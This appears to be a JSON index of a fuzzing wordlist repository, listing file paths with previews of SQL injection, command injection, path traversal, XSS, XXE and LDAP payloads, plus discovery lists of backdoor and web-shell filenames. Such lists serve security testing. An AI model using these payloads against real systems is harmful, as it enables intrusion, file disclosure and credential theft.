"preview": "OPTIONS\nGET\nHEAD\nPOST\nPUT\nDELETE\nTRACE\nTRACK\nCONNECT\nPROPFIND\nPROPPATCH\nMKCOL\nCOPY\nMOVE\nLOCK\nUNLOCK\nVERSION-CONTROL\nREPO"
},
{
"path": "attack/http-protocol/http-request-header-field-names.txt",
"chars": 499,
"preview": "Accept\nAccept-Charset\nAccept-Encoding\nAccept-Language\nAccept-Datetime\nAuthorization\nCache-Control\nConnection\nCookie\nCont"
},
{
"path": "attack/http-protocol/http-response-header-field-names.txt",
"chars": 580,
"preview": "Access-Control-Allow-Origin\nAccept-Ranges\nAge\nAllow\nCache-Control\nConnection\nContent-Encoding\nContent-Language\nContent-L"
},
{
"path": "attack/http-protocol/known-uri-types.txt",
"chars": 1041,
"preview": "aaa:\naaas:\nabout:\nacap:\nadiumxtra:\nafp:\naim:\napt:\naw:\nbeshare:\nbitcoin:\nbolo:\ncallto:\ncap:\nchrome:\ncid:\ncoap:\ncontent:\nc"
},
{
"path": "attack/http-protocol/user-agents.txt",
"chars": 3023,
"preview": "# List of user agents from jbrofuzz (13 april 2010)\nUser-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)\nUser-Ag"
},
{
"path": "attack/integer-overflow/integer-overflows.txt",
"chars": 101,
"preview": "-1\n0\n0x100\n0x1000\n0x3fffffff\n0x7ffffffe\n0x7fffffff\n0x80000000\n0xfffffffe\n0xffffffff\n0x10000\n0x100000\n"
},
{
"path": "attack/ip/localhost.txt",
"chars": 974,
"preview": "127.0.0.1\n127.0.0.2\n127.1\n127.2\n::1\n0:0:0:0:0:0:0:1\n0:0:0:000:0:0:0:1\n0000:0000:0000:0000:0000:0000:0000:0001\n2130706433"
},
{
"path": "attack/json/JSON_Fuzzing.txt",
"chars": 49833,
"preview": "{}\n{\"1\":\"0\"}\n{\"1\":0}\n{\"0\":\"\\x00\"}\n{\"0\":[]}\n{\"0\":[1]}\n{\"0\":[1,2]}\n{\"0\":[\"1\",\"2\"]}\n{\"\\x00\":\"0\"}\n{\"\\x00\":0}\n{\"\\x00\":\"\"}\n{\"\\"
},
{
"path": "attack/ldap/README.md",
"chars": 172,
"preview": "tool:\nhttp://code.google.com/p/ldap-blind-explorer/\n\nvideo:\nhttp://penetration-testing.7safe.com/the-art-of-exploiting-l"
},
{
"path": "attack/ldap/ldap-injection.txt",
"chars": 310,
"preview": "!\n%21\n%26\n%28\n%29\n%2A%28%7C%28mail%3D%2A%29%29\n%2A%28%7C%28objectclass%3D%2A%29%29\n%2A%7C\n%7C\n\\21\n\\26\n\\28\n\\29\n&\n(\n)\n*\n*("
},
{
"path": "attack/lfi/JHADDIX_LFI.txt",
"chars": 27912,
"preview": "/.../.../.../.../.../\n\\…..\\\\\\…..\\\\\\…..\\\\\\\n%00../../../../../../etc/passwd\n%00/etc/passwd%00\n%00../../../../../../etc/sha"
},
{
"path": "attack/lfi/README.md",
"chars": 1108,
"preview": "LFI - Local File Include attacks\n\nTo exploit an LFI bug, you need to be able to write code to a local file and call it f"
},
{
"path": "attack/lfi/common-ms-httpd-log-locations.txt",
"chars": 317,
"preview": "\\Program Files\\Apache Group\\Apache\\logs\\access.log\n\\Program Files\\Apache Group\\Apache\\logs\\error.log\n\\Program Files\\Apac"
},
{
"path": "attack/lfi/common-unix-httpd-log-locations.txt",
"chars": 1414,
"preview": "/apache/logs/error.log \n/apache/logs/access.log \n/apache/logs/error.log \n/apache/logs/access.log \n/apache/logs/error.log"
},
{
"path": "attack/mimetypes/MimeTypes.txt",
"chars": 52520,
"preview": "application/1d-interleaved-parityfec\r\napplication/3gpdash-qoe-report+xml\r\napplication/3gpp-ims+xml\r\napplication/A2L\r\napp"
},
{
"path": "attack/no-sql-injection/Readme.md",
"chars": 669,
"preview": "NoSQL Hacking Docs\n==================\n- https://www.owasp.org/index.php/Testing_for_NoSQL_injection\n- https://arxiv.org/"
},
{
"path": "attack/no-sql-injection/mongodb.txt",
"chars": 494,
"preview": "true, $where: '1 == 1'\n, $where: '1 == 1'\n$where: '1 == 1'\n', $where: '1 == 1'\n1, $where: '1 == 1'\n{ $ne: 1 }\n', $or: [ "
},
{
"path": "attack/os-cmd-execution/Commands-Linux.txt",
"chars": 3908,
"preview": "accept\naccess\naclocal\naconnect\nacpi\nacpi_available\nacpid\naddr2line\naddresses\nagetty\nalsactl\namidi\namixer\nanacron\naplay\na"
},
{
"path": "attack/os-cmd-execution/Commands-OSX.txt",
"chars": 1430,
"preview": "alias\nalloc\napropos\nawk\nbasename\nbash\nbg\nbind\nbless\nbreak\nbuiltin\nbzip\ncal\ncaller\ncase\ncat\ncd\nchflags\nchgrp\nchmod\nchown\n"
},
{
"path": "attack/os-cmd-execution/Commands-Windows.txt",
"chars": 1077,
"preview": "a\narp\nassoc\nat\natmadm\nattrib\nbootcfg\nbreak\ncacls\ncall\nchange\nchcp\nchdir\nchkdsk\nchkntfs\ncipher\ncls\ncmd\ncmstp\ncolor\ncomp\nc"
},
{
"path": "attack/os-cmd-execution/Commands-WindowsPowershell.txt",
"chars": 2166,
"preview": "get-acl\nset-acl\nget-alias\nimport-alias\nnew-alias\nset-alias\nget-authenticodesignature\nset-authenticodesignature\nset-locat"
},
{
"path": "attack/os-cmd-execution/OSCommandInject.Windows.txt",
"chars": 289,
"preview": "+|+Dir+c:\\\n$+|+Dir+c:\\\n%26%26+|+dir c:\\\n$%26%26dir c:\\\n%0a+dir+c:\\\n+|+Dir+c:%255c\n$+|+Dir+c:%255c\n%26%26+|+dir c:%255c\n$"
},
{
"path": "attack/os-cmd-execution/README.md",
"chars": 3677,
"preview": "Remote Command Exec Cheatsheet\n\n**Executing Commands**\n\nVarious ways of separating Commands:<br>\n``` blah;blah2 ```\n\n```"
},
{
"path": "attack/os-cmd-execution/command-execution-unix.txt",
"chars": 828,
"preview": "<!--#exec cmd=\"/usr/bin/id\"-->\n<!--#exec cmd=\"id\"-->\n/index.html|id|\n;id;\n;id\n;netstat -a;\n;id;\n|id\n|/usr/bin/id\n|id|\n|/"
},
{
"path": "attack/os-cmd-execution/command-injection-template.txt",
"chars": 805,
"preview": "{cmd}\n;{cmd}\n;{cmd};\n^{cmd}\n|{cmd}\n<{cmd}\n<{cmd};\n<{cmd}\\n\n<{cmd}%0D\n<{cmd}%0A\n&{cmd}\n&{cmd}&\n&&{cmd}\n&&{cmd}&&\n%0D{cmd}"
},
{
"path": "attack/os-cmd-execution/shell-delimiters.txt",
"chars": 27,
"preview": ";\n^\n&\n&&\n|\n||\n%0D\n%0A\n\\n\n<\n"
},
{
"path": "attack/os-cmd-execution/shell-operators.txt",
"chars": 45,
"preview": "<\n>\n<<\n>>\n<>\n>|\n|\n||\n&\n&&\n$\n;\n&>\n&>>\n<<<\n>>>\n"
},
{
"path": "attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt",
"chars": 64,
"preview": "..%255c\n.%5c../..%5c\n/..%c0%9v../\n/..%c0%af../\n/..%255c..%255c\n\n"
},
{
"path": "attack/os-cmd-execution/useful-commands-unix.txt",
"chars": 117,
"preview": "uname -n -s\nwhoami\npwd\nlast\ncat /etc/passwd\nls -la /tmp\nls -la /home\nping -i 30 127.0.0.1 \nping 127.0.0.1\nping -n 30\n"
},
{
"path": "attack/os-cmd-execution/useful-commands-windows.txt",
"chars": 26,
"preview": "ver\nchdir\necho %USERNAME%\n"
},
{
"path": "attack/os-dir-indexing/directory-indexing.txt",
"chars": 261,
"preview": ";dir\n`dir`\n|dir|\n|dir\n/%3f.jsp\n?M=D\n////////////////////////////////////////////////////////////////////////////////////"
},
{
"path": "attack/path-traversal/README.md",
"chars": 104,
"preview": "\n**traversals-8-deep-exotic-encoding.fuzz.txt**\n\nUse Regex to replace {FILE} with your target filename\n\n"
},
{
"path": "attack/path-traversal/path-traversal-windows.txt",
"chars": 144,
"preview": "C:/inetpub/wwwroot/global.asa\nC:\\inetpub\\wwwroot\\global.asa\nC:/boot.ini\nC:\\boot.ini\nD:\\inetpub\\wwwroot\\global.asa\nD:/ine"
},
{
"path": "attack/path-traversal/traversals-8-deep-exotic-encoding.txt",
"chars": 53532,
"preview": "/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}\n/0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2"
},
{
"path": "attack/redirect/README.md",
"chars": 1089,
"preview": "* redirect-injection-template.txt\n * Patterns for injecting into a value for attempting to bypass many input validati"
},
{
"path": "attack/redirect/redirect-injection-template.txt",
"chars": 146,
"preview": "{target}\n/{target}\n//{target}\n///{target}\n////{target}\n/\\{target}\n%2f{target}\n%2f$2f{target}\n%2f{target}%2f%2f\n$2f%2f{ta"
},
{
"path": "attack/redirect/redirect-urls-template.txt",
"chars": 606,
"preview": "?url=http://{target}\n?url=https://{target}\n?next=http://{target}\n?next=https://{target}\n?url=http://{target}\n?url=https:"
},
{
"path": "attack/rfi/README.md",
"chars": 492,
"preview": "rfi.fuzz.txt\n\nRemote File Include scanning\n\nCompiled by RSnake 02/01/2010 \n\nMostly from milw0rm osvdb.org and elsewhere\n"
},
{
"path": "attack/rfi/rfi.txt",
"chars": 117807,
"preview": "/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?\n/123flashchat.php?e107path=XXpathXX\n/2007/administr"
},
{
"path": "attack/server-side-include/server-side-includes-generic.txt",
"chars": 2702,
"preview": "<!--#config errmsg=\"File not found, informs users and password\"-->\n<!--#config timefmt=\"A %B %d %Y %r\"-->\n<!--#echo var="
},
{
"path": "attack/sql-injection/detect/GenericBlind.txt",
"chars": 911,
"preview": "sleep(__TIME__)#\n1 or sleep(__TIME__)#\n\" or sleep(__TIME__)#\n' or sleep(__TIME__)#\n\" or sleep(__TIME__)=\"\n' or sleep(__T"
},
{
"path": "attack/sql-injection/detect/Generic_SQLI.txt",
"chars": 1,
"preview": "\n"
},
{
"path": "attack/sql-injection/detect/MSSQL.txt",
"chars": 448,
"preview": "; --\n'; --\n'); --\n'; exec master..xp_cmdshell 'ping 10.10.1.2'--\n' grant connect to name; grant resource to name; --\n' o"
},
{
"path": "attack/sql-injection/detect/MSSQL_blind.txt",
"chars": 618,
"preview": "'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --\n'; if not(substring((select @@version),25,1)"
},
{
"path": "attack/sql-injection/detect/MySQL.txt",
"chars": 152,
"preview": "1'1\n1 exec sp_ (or exec xp_)\n1 and 1=1\n1' and 1=(select count(*) from tablenames); --\n1 or 1=1\n1' or '1'='1\n1or1=1\n1'or'"
},
{
"path": "attack/sql-injection/detect/MySQL_MSSQL.txt",
"chars": 328,
"preview": "1\n1 and user_name() = 'dbo'\n\\'; desc users; --\n1\\'1\n1' and non_existant_table = '1\n' or username is not NULL or username"
},
{
"path": "attack/sql-injection/detect/README.md",
"chars": 119,
"preview": "\n**MSSQL.fuzz.txt**\n\nyou will need to customize/modify some of the values in the payload queries for best effect\n\n\n\n\n\n\n"
},
{
"path": "attack/sql-injection/detect/oracle.txt",
"chars": 7830,
"preview": "’ or ‘1’=’1\n' or '1'='1\n'||utl_http.request('httP://192.168.1.1/')||'\n' || myappadmin.adduser('admin', 'newpass') || '\n'"
},
{
"path": "attack/sql-injection/detect/xplatform.txt",
"chars": 3895,
"preview": "<>\"'%;)(&+\n|\n!\n?\n/\n//\n//*\n'\n' -- \n(\n)\n*|\n*/*\n&\n0\n031003000270000\n0 or 1=1\n0x730065006c0065006300740020004000400076006500"
},
{
"path": "attack/sql-injection/exploit/README.md",
"chars": 711,
"preview": "\nvarious useful post-exploitation commands\n\n**ms-sql-enumeration.fuzz.txt**\n* ms-sqli info disclosure payload fuzzfile\n*"
},
{
"path": "attack/sql-injection/exploit/db2-enumeration.txt",
"chars": 540,
"preview": "select versionnumber, version_timestamp from sysibm.sysversions;\nselect user from sysibm.sysdummy1;\nselect session_user "
},
{
"path": "attack/sql-injection/exploit/ms-sql-enumeration.txt",
"chars": 475,
"preview": "select @@version\nselect @@servernamee\nselect @@microsoftversione\nselect * from master..sysserverse\nselect * from sysuser"
},
{
"path": "attack/sql-injection/exploit/mysql-injection-login-bypass.txt",
"chars": 165,
"preview": "<username>' OR 1=1--\n'OR '' = '\tAllows authentication without a valid username.\n<username>'--\n' union select 1, '<user-f"
},
{
"path": "attack/sql-injection/exploit/mysql-read-local-files.txt",
"chars": 105,
"preview": "create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;\n"
},
{
"path": "attack/sql-injection/exploit/postgres-enumeration.txt",
"chars": 649,
"preview": "select version();\t\nselect current_database();\nselect current_user;\nselect session_user;\nselect current_setting('log_conn"
},
{
"path": "attack/sql-injection/payloads-sql-blind/README.md",
"chars": 85,
"preview": "credits: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/\n"
},
{
"path": "attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-INSERT.txt",
"chars": 6105,
"preview": ")%20waitfor%20delay%20'0:0:20'%20/*\n)%20waitfor%20delay%20'0:0:20'%20--\n')%20waitfor%20delay%20'0:0:20'%20/*\n')%20waitfo"
},
{
"path": "attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-WHERE.txt",
"chars": 1241,
"preview": " waitfor delay '0:0:20' /* \n waitfor delay '0:0:20' --\n' waitfor delay '0:0:20' /* \n' waitfor delay '0:0:20' --\n\" waitfo"
},
{
"path": "attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-INSERT.txt",
"chars": 6347,
"preview": "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--\n+if(benchmark(3000000,MD5("
},
{
"path": "attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-ORDER_BY.txt",
"chars": 1521,
"preview": ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n,(select%20if(count(*)!=-1,benchmark("
},
{
"path": "attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-WHERE.txt",
"chars": 1844,
"preview": " and 0=benchmark(3000000,MD5(1))%20/*\n and 0=benchmark(3000000,MD5(1))%20--\n and 0=benchmark(3000000,MD5(1))%20%23\n' and"
},
{
"path": "attack/string-expansion/shell-expansion.txt",
"chars": 35,
"preview": "$HOME\n$ENV{'HOME'}\n%d\n%s\n{0}\n%*.*s\n"
},
{
"path": "attack/unicode/README.md",
"chars": 121,
"preview": "Many of the files in this directory originated from the project\nhttps://github.com/minimaxir/big-list-of-naughty-strings"
},
{
"path": "attack/unicode/corrupted.txt",
"chars": 746,
"preview": "Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r"
},
{
"path": "attack/unicode/emoji.txt",
"chars": 138,
"preview": "\n😍\n👩🏽\n👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 \n🐵 🙈 🙉 🙊\n❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙\n✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿\n🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧\n0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ "
},
{
"path": "attack/unicode/japanese-emoticon.txt",
"chars": 157,
"preview": "ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ \n(。◕ ∀ ◕。)\n`ィ(´∀`∩\n__ロ(,_,*)\n・( ̄∀ ̄)・:*:\n゚・✿ヾ╲(。◕‿◕。)╱✿・゚\n,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’\n(╯°□°)╯︵ ┻━┻) \n(ノ"
},
{
"path": "attack/unicode/naughty-unicode.txt",
"chars": 486,
"preview": "Ω≈ç√∫˜µ≤≥÷\nåß∂ƒ©˙∆˚¬…æ\nœ∑´®†¥¨ˆøπ“‘\n¡™£¢∞§¶•ªº–≠\n¸˛Ç◊ı˜Â¯˘¿\nÅÍÎÏ˝ÓÔÒÚÆ☃\nŒ„´‰ˇÁ¨ˆØ∏”’\n`⁄€‹›fifl‡°·‚—±\n⅛⅜⅝⅞\nЁЂЃЄЅІЇЈЉЊЋЌЍЎЏ"
},
{
"path": "attack/unicode/regionalindicators.txt",
"chars": 119,
"preview": "🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 \n🇺🇸🇷🇺🇸🇦🇫🇦🇲\n🇺🇸🇷🇺🇸🇦\n"
},
{
"path": "attack/unicode/right-to-left.txt",
"chars": 279,
"preview": "ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، "
},
{
"path": "attack/unicode/specialchars.txt",
"chars": 64,
"preview": ",\n.\n/\n;\n'\n[\n]\n\\\n-\n=\n<\n>\n?\n:\n\"\n{\n}\n|\n_\n+\n!\n@\n#\n$\n%\n^\n&\n*\n(\n)\n`\n~\n"
},
{
"path": "attack/unicode/two-byte-chars.txt",
"chars": 93,
"preview": "田中さんにあげて下さい\nパーティーへ行かないか\n和製漢語\n部落格\n사회과학원 어학연구소\n찦차를 타고 온 펲시맨과 쑛다리 똠방각하\n社會科學院語學研究所\n울란바토르\n𠜎𠜱𠝹𠱓𠱸𠲖𠳏\n"
},
{
"path": "attack/unicode/upsidedown.txt",
"chars": 131,
"preview": "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝ"
},
{
"path": "attack/xml/xml-attacks.txt",
"chars": 2887,
"preview": "-\n' or ''='\n' or '1'='1\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SY"
},
{
"path": "attack/xpath/README.md",
"chars": 173,
"preview": "tool:\nhttp://code.google.com/p/xpath-blind-explorer/\n\nvideo:\nhttp://penetration-testing.7safe.com/the-art-of-exploiting-"
},
{
"path": "attack/xpath/xpath-injection.txt",
"chars": 209,
"preview": "' or '1'='1\n' or ''='\nx' or 1=1 or 'x'='y\n/\n//\n//*\n*/*\n@*\ncount(/child::node())\nx' or name()='username' or 'x'='y\n' and "
},
{
"path": "attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt",
"chars": 89493,
"preview": "A very short cross browser header injection\nExploit Name: A very short cross browser header injection\nExploit String: wi"
},
{
"path": "attack/xss/README.md",
"chars": 707,
"preview": "test.xxe - requested by some payloads from fuzzdb github repo raw filepath<br>\nxss-rsnake.fuzz.txt - rsnake's classic fu"
},
{
"path": "attack/xss/XSSPolyglot.txt",
"chars": 3826,
"preview": "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<s"
},
{
"path": "attack/xss/all-encodings-of-lt.txt",
"chars": 590,
"preview": "<\n%3C\n%253C\n%25253C\n<\n<\n<\n<\n<\n<\n<\n<\n<\n<\n<\n<\n<\n<\n"
},
{
"path": "attack/xss/default-javascript-event-attributes.txt",
"chars": 205,
"preview": "onAbort\nonBlur\nonChange\nonClick\nonDblClick\nonDragDrop\nonError\nonFocus\nonKeyDown\nonKeyPress\nonKeyUp\nonLoad\nonMouseDown\non"
},
{
"path": "attack/xss/html-event-attributes.txt",
"chars": 2433,
"preview": "onabort\nonactivate\nonafterprint\nonafterupdate\nonanimationend\nonanimationiteration\nonanimationstart\nonautocomplete\nonauto"
},
{
"path": "attack/xss/test.xxe",
"chars": 63,
"preview": "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(1)</script>\n"
},
{
"path": "attack/xss/xss-other.txt",
"chars": 21706,
"preview": "'\n <font style='color:expression(alert('XSS'))'>\n' onmouseover=alert(/Black.Spook/)\n' or 2=2\n\"\n\" or 202\n\";eval(unescape("
},
{
"path": "attack/xss/xss-rsnake.txt",
"chars": 4324,
"preview": "<SCRIPT>alert('XSS');</SCRIPT>\n'';!--\"<XSS>=&{()}\n<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\n<IMG SRC=\"javascript:ale"
},
{
"path": "attack/xss/xss-uri.txt",
"chars": 1750,
"preview": "aim: &c:\\windows\\system32\\calc.exe\" ini=\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat\"\nfiref"
},
{
"path": "discovery/URI_SCHEMES/IANA_registerd_URI_schemes.txt",
"chars": 3461,
"preview": "aaa://\naaas://\nabout://\nacap://\nacct://\nacr://\nadiumxtra://\nafp://\nafs://\naim://\nappdata://\napt://\nattachment://\naw://\nb"
},
{
"path": "discovery/UserAgent/UserAgentListCommon.txt",
"chars": 1662,
"preview": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6\nMozilla/4.0 (compatible; MSIE"
},
{
"path": "discovery/UserAgent/UserAgentListLarge.txt",
"chars": 954918,
"preview": "(Windows NT 6.2; WOW64) KHTML/4.11 Gecko/20130308 Firefox/23.0 (PaleMoon/20.3)\nABACHOBot\nAccoona-AI-Agent/1.1.1 (crawler"
},
{
"path": "discovery/UserAgent/UserAgents.txt",
"chars": 110737,
"preview": "!Susie (http://www.sync2it.com/susie)\n<a href='http://www.unchaos.com/'\n<a href='http://www.unchaos.com/'\n<b\n&l"
},
{
"path": "discovery/WebSocket/WebSocket-subprotocols.txt",
"chars": 1144,
"preview": "# this list can be used to enumerate supported Web Socket sub protocols of a web socket server\n# It conyains the officia"
},
{
"path": "discovery/common-methods/common-methods.txt",
"chars": 734,
"preview": "account\naccounts\nactive\nactivity\napikey\nbalance\nblock\nblocks\ncalendar\ncategory\nchange\ncheck\nclose\ncoins\ncompany\ncreate\nc"
},
{
"path": "discovery/dns/CcTLD.txt",
"chars": 1090,
"preview": "한국\nไทย\nଭାରତ\nac\nad\nae\naf\nag\nai\nal\nam\nan\nao\naq\nar\nas\nat\nau\naw\nax\naz\nba\nbb\nbd\nbe\nbf\nbg\nbh\nbi\nbj\nbl\nbm\nbn\nbo\nbq\nbr\nbs\nbt\nbv\n"
},
{
"path": "discovery/dns/alexaTop1mAXFRcommonSubdomains.txt",
"chars": 378920,
"preview": "www\nmail\nftp\nlocalhost\nsmtp\npop\nwebmail\nns\nwebdisk\nautodiscover\ncpanel\nwhm\nm\n_autodiscover\n_tcp\ntest\nautoconfig\nimap\ndef"
},
{
"path": "discovery/dns/dnsmapCommonSubdomains.txt",
"chars": 4048,
"preview": "a\naa\nab\nac\naccess\naccounting\naccounts\nad\nadmin\nadministrator\nae\naf\nag\nah\nai\naix\naj\nak\nal\nam\nan\nao\nap\napollo\naq\nar\narchiv"
},
{
"path": "discovery/dns/gTLD.txt",
"chars": 8086,
"preview": "삼성\nセール\nポイント\nファッション\naaa\naarp\nabarth\nabb\nabbott\nabbvie\nabc\nable\nabogado\nabudhabi\nacademy\naccenture\naccountant\naccountants\n"
},
{
"path": "discovery/predictable-filepaths/KitchensinkDirectories.txt",
"chars": 21260,
"preview": "/...\n/.CVS\n/0\n/00001\n/0001\n/001\n/007\n/04\n/0day\n/1\n/10\n/1000\n/11\n/111\n/1111\n/123\n/123123\n/123321\n/123settle\n/1337\n/2\n/2te"
},
{
"path": "discovery/predictable-filepaths/Randomfiles.txt",
"chars": 293,
"preview": "/accounts.txt\n/culeadora.txt\n/data.txt\n/database.txt\n/grabbed.html\n/info.txt\n/l0gs.txt\n/log.txt\n/logins.txt\n/logs.txt\n/m"
},
{
"path": "discovery/predictable-filepaths/UnixDotfiles.txt",
"chars": 863,
"preview": "/.DS_Store\n/.FBCIndex\n/.access\n/.addressbook\n/.bash_history\n/.bashrc\n/.cobalt\n/.cobalt/alert/service.cgi?service=<img%20"
},
{
"path": "discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt",
"chars": 338,
"preview": "3fexe.asp\nASpy.asp\nEFSO.asp\nRemExp.asp\naspxSH.asp\naspxshell.aspx\naspydrv.asp\ncmd.asp\ncmd.aspx\ncmdexec.aspx\nelmaliseker.a"
},
{
"path": "discovery/predictable-filepaths/backdoors/bot_control_panels.txt",
"chars": 30343,
"preview": "00284d896df6965cf6b6e99718ddcd99315200ca.file.rights.tpl.php\n00ebbfdc60999b54fdbf35a0699c3551b09a33b9.file.index.tpl.php"
},
{
"path": "discovery/predictable-filepaths/backdoors/shells.txt",
"chars": 9499,
"preview": "admin\nblog\nconf_global.php\nconfig.php\nconfiguration.php\nconf.php\nconnect.php\ndb.php\nforum\ninc\ninclude\nincludes\njoomla\nmk"
},
{
"path": "discovery/predictable-filepaths/cgi/CGI_HTTP_POST.txt",
"chars": 310,
"preview": "post-query\nConfig1.htm\nMy_eGallery/public/displayCategory.php\nservlet/custMsg?guestName=<script>alert(document.cookie)(\\"
},
{
"path": "discovery/predictable-filepaths/cgi/CGI_HTTP_POST_Windows.txt",
"chars": 689,
"preview": "_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611\n_vti_bin/shtml.exe/_vti_rpc?method=server+version%3"
},
{
"path": "discovery/predictable-filepaths/cgi/CGI_Microsoft.txt",
"chars": 2268,
"preview": "# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything or be the webroot.\n/cart32.exe\n/get"
},
{
"path": "discovery/predictable-filepaths/cgi/CGI_XPlatform.txt",
"chars": 140025,
"preview": "# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /c"
},
{
"path": "discovery/predictable-filepaths/cms/README.md",
"chars": 272,
"preview": "**CMS files generated with cms-explorer** http://code.google.com/p/cms-explorer/\nuse the provided lists for q&d but cms "
},
{
"path": "discovery/predictable-filepaths/cms/drupal_plugins.txt",
"chars": 133596,
"preview": "modules/.gitdrush/\nmodules/.settings/\nmodules/AudioRecordingField/\nmodules/AutoUpdateSearch/\nmodules/BookMadeSimple/\nmod"
},
{
"path": "discovery/predictable-filepaths/cms/drupal_themes.txt",
"chars": 14777,
"preview": "themes/001%20Dev%20Skin/\nthemes/001_dev_skin/\nthemes/002_dev_skin/\nthemes/08paros/\nthemes/1024px/\nthemes/4_of_July/\nthem"
},
{
"path": "discovery/predictable-filepaths/cms/joomla_plugins.txt",
"chars": 5620,
"preview": "components/com_acajoom/\ncomponents/com_aclassf/\ncomponents/com_acmisc/\ncomponents/com_adsmanager/\ncomponents/com_agora/\n"
},
{
"path": "discovery/predictable-filepaths/cms/joomla_themes.txt",
"chars": 702,
"preview": "templates/abc/\ntemplates/atomic/\ntemplates/b59-tpl8/\ntemplates/beez/\ntemplates/carbon_07/\ntemplates/crub/\ntemplates/dm_a"
},
{
"path": "discovery/predictable-filepaths/cms/php-nuke.txt",
"chars": 101279,
"preview": "Addons-Modules.txt\nBlocks.txt\nChanges.txt\nCopying.txt\nCredits.txt\nInstall.txt\nReadme.txt\nSupport.txt\nUpgrade.txt\nhtml/ad"
},
{
"path": "discovery/predictable-filepaths/cms/wordpress.txt",
"chars": 58736,
"preview": "index.php\nlicense.txt\nreadme.html\nwp-activate.php\nwp-admin/\nwp-admin/about.php\nwp-admin/admin-ajax.php\nwp-admin/admin-db"
},
{
"path": "discovery/predictable-filepaths/cms/wp_common_theme_files.txt",
"chars": 561,
"preview": "404.php\narchive.php\narchives.php\nauthor.php\ncategory.php\ncomments.php\ncontent.php\ndata.php\nfooter.php\nfunctions.php\nhead"
},
{
"path": "discovery/predictable-filepaths/cms/wp_plugins.txt",
"chars": 505155,
"preview": "wp-content/plugins/%c2%b5mint/\nwp-content/plugins/%d0%af%d0%bd%d0%b4%d0%b5%d0%ba%d1%81%d0%a4%d0%be%d1%82%d0%ba%d0%b8/\nwp"
},
{
"path": "discovery/predictable-filepaths/cms/wp_plugins_full.txt",
"chars": 2741748,
"preview": "wp-content/plugins/0-errors/\nwp-content/plugins/001-prime-strategy-translate-accelerator/\nwp-content/plugins/002-ps-cust"
},
{
"path": "discovery/predictable-filepaths/cms/wp_plugins_top225.txt",
"chars": 4080,
"preview": "google-sitemap-generator\nredirection\nwptouch\nultimate-tinymce\nfacebook\nwp-smushit\nshare-this\nwp-super-cache\niwp-client\na"
},
{
"path": "discovery/predictable-filepaths/cms/wp_themes.readme",
"chars": 432,
"preview": "Themes usually live in a directory called wp-content.\n\nDetermine how the server handles directories which aren't present"
},
{
"path": "discovery/predictable-filepaths/cms/wp_themes.txt",
"chars": 89249,
"preview": "0211022_naranja_dos\n0211027\n08-rainbow-feather-v3-english-version\n_09dsa-theme\n10070619-008\n10070619-011\n10070619-030\n10"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/3CharExtBrute.txt",
"chars": 70304,
"preview": "aaa\naab\naac\naad\naae\naaf\naag\naah\naai\naaj\naak\naal\naam\naan\naao\naap\naaq\naar\naas\naat\naau\naav\naaw\naax\naay\naaz\naba\nabb\nabc\nabd\n"
},
{
